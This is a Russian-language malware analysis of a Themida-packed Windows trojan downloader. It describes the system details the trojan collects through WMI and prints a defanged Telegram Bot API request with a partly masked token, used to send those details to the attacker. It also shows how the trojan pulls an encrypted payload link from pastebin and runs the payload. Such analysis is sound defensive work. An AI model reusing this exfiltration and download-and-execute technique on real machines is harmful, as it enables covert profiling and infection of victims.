Упаковщик: Themida
Дата компиляции: 21.09.2023 12:32:30
SHA1-хеш:
- 3f34031b923dc68667859162260b22830cbce521 (Проводник.exe)
Описание
Троянская программа, написанная на языке C++ и работающая на компьютерах под управлением ОС семейства Microsoft Windows. Предназначена для загрузки и запуска вредоносной полезной нагрузки в инфицированной системе.
Принцип действия
При запуске троян собирает следующую информацию об инфицированной системе:
Имя параметра (key) | Содержимое (value) | Способ получения |
---|---|---|
Computer Name | Имя данного компьютера | |
Windows Version | Версия Windows | |
Total RAM | Объем оперативной памяти | \root\CIMV2 ― сущность Win32_ComputerSystem ― поле TotalPhysicalMemory |
Processor | Имя процессора | \root\CIMV2 ― сущность Win32_Processor ― поле Name |
External IP | IP-адрес пользователя | Из ответа при обращении к hxxp[:]//api.ipify[.]org |
Manufacturer | Имя производителя ПК | \root\CIMV2 ― сущность Win32_ComputerSystem ― поле Manufacturer |
Model | Имя, присвоенное компьютеру производителем (имя модели ПК) | \root\CIMV2 ― сущность Win32_ComputerSystem ― поле Model |
BIOS | Содержит информацию о BIOS |
Также собирается информация о BIOS:
Имя параметра (key) | Содержимое (value) | Способ получения |
---|---|---|
Version | Версия BIOS | \root\CIMV2 ― сущность Win32_BIOS ― поле Version |
Release Date | Дата выпуска BIOS | \root\CIMV2 ― сущность Win32_BIOS ― поле ReleaseDate |
Caption | Описание от производителя | \root\CIMV2 ― сущность Win32_BIOS ― поле Caption |
SMBIOS | Версия SMBIOS | \root\CIMV2 ― сущность Win32_BIOS ― поле SMBIOSBIOSVersion |
Далее полученная техническая информация о системе в виде строки формата <key>:<value>\n.... передается Telegram-боту со следующими параметрами:
- 6393******:**********FKPI8su1qdfenHz********** ― токен бота;
- 6346****** ― идентификатор чата (chat_id).
Пример итогового запроса:
hxxps[:]//api[.]telegram[.]org/bot6393******:**********FKPI8su1qdfenHz**********/sendMessage?chat_id=6346******&text=<системная информация>
Отправив сообщение с информацией о системе, троян получает со страницы hxxps[:]//pastebin[.]com/y5NUQPwY зашифрованную целевую ссылку. После ее расшифровки он скачивает полезную нагрузку, сохраняет ее в %LOCALAPPDATA%\Default\Windows\data\ldled и запускает на исполнение.
Артефакты
В коде трояна содержится информация с отладочными символами: C:\Users\Snusoed\source\repos\Scaner_load\Release\Scaner_load.pdb.